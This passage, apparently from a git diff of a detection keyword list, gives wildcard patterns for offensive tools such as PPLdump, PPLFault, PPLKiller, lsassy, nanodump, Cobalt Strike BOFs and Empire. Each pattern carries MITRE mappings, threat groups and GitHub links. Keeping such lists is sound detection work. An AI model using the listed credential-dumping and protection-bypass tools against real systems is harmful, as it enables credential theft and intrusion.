domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist","T1087 - T1069 - T1064 - T1002 - T1552","TA0002 - TA0003 - TA0008","N/A","N/A","Information Gathering","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon","1","0","N/A","N/A","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*powerview.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*PowerView.ps1*","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality It also implements various useful metafunctions. including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist","T1087 - T1069 - T1064 - T1002 - T1552","TA0002 - TA0003 - TA0008","N/A","N/A","Information Gathering","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon","1","0","N/A","N/A","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerView_dev.ps1*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" "*PowerView3-Aggressor*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*ppenum.c*","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","90","7","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" @@ -15042,71 +15210,71 @@ "*ppldump *","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","0","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*PPLdump*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*PPLdump.exe*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" -"*ppldump.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*ppldump.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*PPLDump_BOF.*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" -"*ppldump_embedded*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*ppldump_embedded*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*PPLdump64.exe*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*PPLdumpDll*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" -"*PPLFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*pplfault.cna*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*PPLFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFault.exe*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*PPLFaultDumpBOF*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*PPLFault-Localhost-SMB.ps1*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFault-Localhost-SMB.ps1*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*PPLFaultPayload.dll*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*PPLFaultPayload.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLFaultPayload.dll*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*PPLFaultTemp*","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","115","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" -"*PPLFaultTemp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" -"*PPLKiller.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" -"*PPLKiller.sln*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" -"*PPLKiller.vcxproj*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" -"*PPLKiller-master*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLFaultTemp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*PPLKiller.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller.sln*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller.vcxproj*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*PPLKiller-master*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","1","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" "*PppEWCIgXbsepIwnuRIHtQLC*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" -"*ppypykatz.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*ppypykatz.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*praetorian.antihacker*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*praetorian-inc/gato*","offensive_tool_keyword","gato","GitHub Self-Hosted Runner Enumeration and Attack Tool","T1083 - T1087 - T1081","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/praetorian-inc/gato","1","1","N/A","N/A","3","263","24","2023-07-27T15:15:32Z","2023-01-06T15:43:27Z" "*praetorian-inc/noseyparker*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "*praetorian-inc/PortBender*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" "*pre2k auth * --dc-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*prepare_ppl_command_line*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" -"*prepareResponseForHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*prepareResponseForHiddenAPICall*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*PrimusC2-main.zip*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","1","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z" "*print_shtinkering_crash_location*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*printerbug.py *:*@* *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*PrinterNotifyPotato *","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","0","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*PrinterNotifyPotato.*","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","10","4","326","46","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z" "*PrintNightmare.*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","0","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" -"*printnightmare_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network 